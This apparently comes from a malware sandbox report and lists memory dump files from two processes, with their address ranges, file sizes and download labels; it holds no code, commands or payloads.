memory/3940-18-0x0000000005C40000-0x0000000005C5E000-memory.dmp

Filesize
120KB

Download
memory/3940-1-0x00000000046C0000-0x00000000046F6000-memory.dmp

Filesize
216KB

Download
memory/3940-3-0x00000000713F0000-0x0000000071BA0000-memory.dmp

Filesize
7.7MB

Download
memory/3940-2-0x0000000004D30000-0x0000000005358000-memory.dmp

Filesize
6.2MB

Download
memory/4652-102-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/4652-101-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/4652-126-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/4652-134-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download